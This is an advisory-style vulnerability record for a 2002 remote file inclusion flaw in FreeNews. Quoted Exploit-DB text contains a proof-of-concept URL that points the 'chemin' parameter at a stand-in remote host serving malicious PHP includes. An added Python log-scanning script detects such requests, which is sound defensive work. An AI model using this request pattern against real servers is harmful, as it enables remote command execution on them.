Vendor: FreeNews
By: SecurityFocus
CVSS: 7.5 (HIGH)
Type: Arbitrary File Inclusion
CWE: 98
Product Name: FreeNews
Affected Version From: 1
Affected Version To: 1.0.2
Patch Exists: Yes
Related CWE: N/A
CPE: a:freenews:freenews
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Unix and Linux
Year: 2002

FreeNews Arbitrary File Inclusion Vulnerability

FreeNews is a freely available, open source news software package written in PHP and designed for use on Unix and Linux operating systems. Programming errors in FreeNews could allow files hosted on remote servers to be included in the web application. A remote user can place commands in these include files, which are then executed on the local host, making remote arbitrary command execution as the web user possible.

Mitigation:

The vendor has released a patch to address this issue. Users should upgrade to the latest version of FreeNews.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/6258/info

FreeNews is a freely available, open source News software package. It is written in PHP, and designed for use on Unix and Linux operating systems.

Programming errors in FreeNews could lead to the inclusion of arbitrary files on remote servers in the web application. It is possible for a remote user to place commands in these include files that could result in execution on the local host. This would make remote arbitrary command execution as the web user possible. 

http://example.com/aff_news.php?chemin=http://example.org/include

with
http://example.org/config.php
http://example.org/options.inc.php
http://example.org/freenews_functions.inc.php
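
One way to check web server logs for requests of the kind shown above, as an added example that is not part of the original advisory or of FreeNews itself. It assumes Apache combined log format; the log lines are constructed, and the benign value `chemin=include` is an assumption about normal use.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines in Apache combined log format (not real traffic).
# "chemin=include" as the benign value is an assumption made for illustration.
SAMPLE_LOG = """\
192.0.2.10 - - [01/Dec/2002:10:00:01 +0000] "GET /aff_news.php?chemin=include HTTP/1.0" 200 5120 "-" "Mozilla/4.0"
192.0.2.44 - - [01/Dec/2002:10:02:13 +0000] "GET /aff_news.php?chemin=http://example.org/include HTTP/1.0" 200 812 "-" "-"
192.0.2.44 - - [01/Dec/2002:10:02:20 +0000] "GET /aff_news.php?id=3&chemin=hTTp%3A%2F%2Fexample.org%2Finclude HTTP/1.0" 200 812 "-" "-"
192.0.2.71 - - [01/Dec/2002:10:05:40 +0000] "GET /index.php?ref=http://example.net/ HTTP/1.0" 200 2048 "-" "-"
"""

# client IP, timestamp, method and request target from one log line
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*"')
# A scheme prefix (http://, ftp://, ...) or a protocol-relative "//host".
REMOTE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.\-]*:)?//', re.IGNORECASE)


def remote_include_attempts(log_text, param="chemin"):
    """Return (client_ip, timestamp, decoded_value) for each request whose
    `param` value points at a remote location instead of a local directory."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a parseable request line
        ip, ts, _method, target = m.groups()
        query = urlsplit(target).query
        # parse_qsl percent-decodes values, so encoded schemes are caught too.
        for name, value in parse_qsl(query, keep_blank_values=True):
            if name == param and REMOTE_RE.match(value):
                hits.append((ip, ts, value))
    return hits


if __name__ == "__main__":
    for ip, ts, value in remote_include_attempts(SAMPLE_LOG):
        print(f"{ts} {ip} chemin -> {value}")
```

Only GET query strings are inspected here; a value sent in a POST body does not appear in a standard access log and needs request-body logging or a WAF rule to be seen.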